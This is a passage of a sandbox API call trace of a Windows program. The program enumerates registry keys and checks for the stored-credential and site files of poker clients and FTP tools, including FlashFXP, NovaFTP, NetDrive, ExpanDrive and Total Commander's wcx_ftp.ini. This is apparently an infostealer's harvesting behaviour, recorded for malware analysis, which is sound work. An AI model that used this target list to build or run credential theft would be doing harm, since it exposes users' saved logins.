pszName="Classes", pcchName=0xdfb90) returned 0x0 [0114.580] GetProcessHeap () returned 0x5b0000 [0114.580] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa20 [0114.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.581] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="Classes", phkResult=0x5caa20 | out: phkResult=0x5caa20*=0x1f0) returned 0x0 [0114.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.582] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0114.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.584] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.584] GetProcessHeap () returned 0x5b0000 [0114.584] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa20 | out: hHeap=0x5b0000) returned 1 [0114.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.585] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x9, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="", pcchName=0xdfb90) returned 0x103 [0114.585] GetProcessHeap () returned 0x5b0000 [0114.586] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.587] RegCloseKey (hKey=0x1fc) returned 0x0 [0114.587] GetProcessHeap () returned 0x5b0000 [0114.587] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0114.587] GetProcessHeap () returned 0x5b0000 [0114.587] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.588] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.588] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0114.589] Sleep (dwMilliseconds=0xa) [0114.614] GetProcessHeap () returned 0x5b0000 [0114.614] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cb930 [0114.614] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.615] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s", arglist=0xdf920 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0114.615] GetProcessHeap () returned 0x5b0000 [0114.615] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x62) returned 0x5caae8 [0114.615] GetProcessHeap () returned 0x5b0000 [0114.616] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.616] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\pokerstars*"), lpFindFileData=0xdf934 | out: lpFindFileData=0xdf934*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x68, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x5caae8, ftLastWriteTime.dwLowDateTime=0x80, ftLastWriteTime.dwHighDateTime=0x5c8b68, nFileSizeHigh=0x0, nFileSizeLow=0x73, dwReserved0=0x1010000, dwReserved1=0x73, cFileName="s", cAlternateFileName="ᕿ酰맬ィ")) returned 0xffffffff [0114.616] GetProcessHeap () returned 0x5b0000 [0114.617] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.617] GetProcessHeap () returned 0x5b0000 [0114.617] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.617] GetProcessHeap () returned 0x5b0000 [0114.617] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.617] GetProcessHeap () returned 0x5b0000 [0114.617] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc158 [0114.617] GetProcessHeap () returned 0x5b0000 [0114.617] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.618] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.618] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0114.618] GetProcessHeap () returned 0x5b0000 [0114.618] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5a) returned 0x5cbd20 [0114.619] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.620] wvsprintfW (in: param_1=0x5cbd20, param_2="%s\\ExpanDrive", arglist=0xdfb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0114.620] GetProcessHeap () returned 0x5b0000 [0114.620] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0114.620] GetProcessHeap () returned 0x5b0000 [0114.620] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd20 | out: hHeap=0x5b0000) returned 1 [0114.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.621] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0114.621] GetProcessHeap () returned 0x5b0000 [0114.621] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.621] GetProcessHeap () returned 0x5b0000 [0114.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.622] GetProcessHeap () returned 0x5b0000 [0114.622] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.622] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.623] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0114.623] GetProcessHeap () returned 0x5b0000 [0114.623] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5a) returned 0x5cbd20 [0114.624] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.624] wvsprintfW (in: param_1=0x5cbd20, param_2="%s\\ExpanDrive", arglist=0xdfb6c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0114.624] GetProcessHeap () returned 0x5b0000 [0114.625] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0114.625] GetProcessHeap () returned 0x5b0000 [0114.625] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd20 | out: hHeap=0x5b0000) returned 1 [0114.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.626] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0114.626] GetProcessHeap () returned 0x5b0000 [0114.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.626] GetProcessHeap () returned 0x5b0000 [0114.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.626] GetProcessHeap () returned 0x5b0000 [0114.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.627] GetProcessHeap () returned 0x5b0000 [0114.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc158 | out: hHeap=0x5b0000) returned 1 [0114.627] GetProcessHeap () returned 0x5b0000 [0114.627] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6c) returned 0x5cb930 [0114.627] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.628] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Steed\\bookmarks.txt", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0114.628] GetProcessHeap () returned 0x5b0000 [0114.628] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x76) returned 0x5c7a90 [0114.628] GetProcessHeap () returned 0x5b0000 [0114.629] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.630] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0114.630] GetProcessHeap () returned 0x5b0000 [0114.630] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7a90 | out: hHeap=0x5b0000) returned 1 [0114.630] GetProcessHeap () returned 0x5b0000 [0114.630] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x400) returned 0x5cb930 [0114.630] GetProcessHeap () returned 0x5b0000 [0114.630] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1a0 [0114.630] GetProcessHeap () returned 0x5b0000 [0114.630] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.631] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.631] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.631] GetProcessHeap () returned 0x5b0000 [0114.631] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f56) returned 0x5cbd38 [0114.632] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.633] wvsprintfW (in: param_1=0x5cbd38, param_2="%s\\FlashFXP", arglist=0xdfb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0114.633] GetProcessHeap () returned 0x5b0000 [0114.633] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0114.633] GetProcessHeap () returned 0x5b0000 [0114.633] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd38 | out: hHeap=0x5b0000) returned 1 [0114.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.634] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0114.634] GetProcessHeap () returned 0x5b0000 [0114.634] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.635] GetProcessHeap () returned 0x5b0000 [0114.635] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.635] GetProcessHeap () returned 0x5b0000 [0114.635] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.636] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.636] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.636] GetProcessHeap () returned 0x5b0000 [0114.636] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f56) returned 0x5cbd38 [0114.637] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.638] wvsprintfW (in: param_1=0x5cbd38, param_2="%s\\FlashFXP", arglist=0xdfb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0114.638] GetProcessHeap () returned 0x5b0000 [0114.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0114.638] GetProcessHeap () returned 0x5b0000 [0114.638] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd38 | out: hHeap=0x5b0000) returned 1 [0114.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.639] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0114.640] GetProcessHeap () returned 0x5b0000 [0114.640] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.640] GetProcessHeap () returned 0x5b0000 [0114.640] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.640] GetProcessHeap () returned 0x5b0000 [0114.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.641] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.641] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\ProgramData") returned 0x0 [0114.642] GetProcessHeap () returned 0x5b0000 [0114.642] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f56) returned 0x5cbd38 [0114.643] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.644] wvsprintfW (in: param_1=0x5cbd38, param_2="%s\\FlashFXP", arglist=0xdfb58 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0114.644] GetProcessHeap () returned 0x5b0000 [0114.644] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x32) returned 0x5be108 [0114.644] GetProcessHeap () returned 0x5b0000 [0114.644] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd38 | out: hHeap=0x5b0000) returned 1 [0114.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.646] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0114.646] GetProcessHeap () returned 0x5b0000 [0114.646] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.646] GetProcessHeap () returned 0x5b0000 [0114.647] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5be108 | out: hHeap=0x5b0000) returned 1 [0114.647] GetProcessHeap () returned 0x5b0000 [0114.647] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.647] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.648] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\ProgramData") returned 0x0 [0114.648] GetProcessHeap () returned 0x5b0000 [0114.648] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f56) returned 0x5cbd38 [0114.649] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.649] wvsprintfW (in: param_1=0x5cbd38, param_2="%s\\FlashFXP", arglist=0xdfb88 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0114.649] GetProcessHeap () returned 0x5b0000 [0114.649] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x32) returned 0x5be188 [0114.649] GetProcessHeap () returned 0x5b0000 [0114.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd38 | out: hHeap=0x5b0000) returned 1 [0114.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.651] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0114.651] GetProcessHeap () returned 0x5b0000 [0114.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.652] GetProcessHeap () returned 0x5b0000 [0114.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5be188 | out: hHeap=0x5b0000) returned 1 [0114.652] GetProcessHeap () returned 0x5b0000 [0114.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.652] GetProcessHeap () returned 0x5b0000 [0114.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1a0 | out: hHeap=0x5b0000) returned 1 [0114.653] GetProcessHeap () returned 0x5b0000 [0114.653] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.653] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.654] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0114.654] GetProcessHeap () returned 0x5b0000 [0114.654] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5cb930 [0114.654] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.655] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0114.655] GetProcessHeap () returned 0x5b0000 [0114.655] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5caae8 [0114.655] GetProcessHeap () returned 0x5b0000 [0114.656] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.656] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0114.657] GetProcessHeap () returned 0x5b0000 [0114.657] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.657] GetProcessHeap () returned 0x5b0000 [0114.657] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.657] GetProcessHeap () returned 0x5b0000 [0114.657] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5cb930 [0114.658] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.659] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NetDrive\\NDSites.ini", arglist=0xdfb9c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0114.659] GetProcessHeap () returned 0x5b0000 [0114.659] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x78) returned 0x5c7090 [0114.659] GetProcessHeap () returned 0x5b0000 [0114.659] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.667] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0114.667] GetProcessHeap () returned 0x5b0000 [0114.668] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7090 | out: hHeap=0x5b0000) returned 1 [0114.668] GetProcessHeap () returned 0x5b0000 [0114.668] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5cb930 [0114.669] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.669] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NetDrive2\\drives.dat", arglist=0xdfb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0114.669] GetProcessHeap () returned 0x5b0000 [0114.669] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x78) returned 0x5c7610 [0114.670] GetProcessHeap () returned 0x5b0000 [0114.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.671] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0114.671] GetProcessHeap () returned 0x5b0000 [0114.672] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7610 | out: hHeap=0x5b0000) returned 1 [0114.672] GetProcessHeap () returned 0x5b0000 [0114.672] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.672] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.673] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\ProgramData") returned 0x0 [0114.673] GetProcessHeap () returned 0x5b0000 [0114.673] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5cb930 [0114.673] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.674] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NetDrive2\\drives.dat", arglist=0xdfb84 | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0114.674] GetProcessHeap () returned 0x5b0000 [0114.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5caae8 [0114.674] GetProcessHeap () returned 0x5b0000 [0114.675] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.676] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0114.676] GetProcessHeap () returned 0x5b0000 [0114.677] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.677] GetProcessHeap () returned 0x5b0000 [0114.677] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.677] GetProcessHeap () returned 0x5b0000 [0114.677] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.678] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.679] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Windows") returned 0x0 [0114.679] GetProcessHeap () returned 0x5b0000 [0114.679] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5c) returned 0x5cb930 [0114.679] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.680] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\wcx_ftp.ini", arglist=0xdfb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0114.680] GetProcessHeap () returned 0x5b0000 [0114.680] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x30) returned 0x5c6908 [0114.680] GetProcessHeap () returned 0x5b0000 [0114.681] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.682] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0114.682] GetProcessHeap () returned 0x5b0000 [0114.683] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6908 | out: hHeap=0x5b0000) returned 1 [0114.683] GetProcessHeap () returned 0x5b0000 [0114.683] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.683] GetProcessHeap () returned 0x5b0000 [0114.683] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5c) returned 0x5cb930 [0114.684] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.685] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\wcx_ftp.ini", arglist=0xdfb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0114.685] GetProcessHeap () returned 0x5b0000 [0114.685] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x66) returned 0x5c9390 [0114.685] GetProcessHeap () returned 0x5b0000 [0114.685] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.686] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0114.686] GetProcessHeap () returned 0x5b0000 [0114.687] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.687] GetProcessHeap () returned 0x5b0000 [0114.687] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.688] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.688] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0114.688] GetProcessHeap () returned 0x5b0000 [0114.688] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5c) returned 0x5cb930 [0114.689] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.690] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\wcx_ftp.ini", arglist=0xdfb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0114.690] GetProcessHeap () returned 0x5b0000 [0114.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x46) returned 0x5c91f0 [0114.690] GetProcessHeap () returned 0x5b0000 [0114.690] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.691] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0114.691] GetProcessHeap () returned 0x5b0000 [0114.691] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c91f0 | out: hHeap=0x5b0000) returned 1 [0114.692] GetProcessHeap () returned 0x5b0000 [0114.692] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.692] GetProcessHeap () returned 0x5b0000 [0114.692] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6c) returned 0x5cb930 [0114.692] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.693] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0xdfb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0114.693] GetProcessHeap () returned 0x5b0000 [0114.693] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x76) returned 0x5c7010 [0114.693] GetProcessHeap () returned 0x5b0000 [0114.694] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.695] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0114.695] GetProcessHeap () returned 0x5b0000 [0114.695] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7010 | out: hHeap=0x5b0000) returned 1 [0114.695] GetProcessHeap () returned 0x5b0000 [0114.695] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 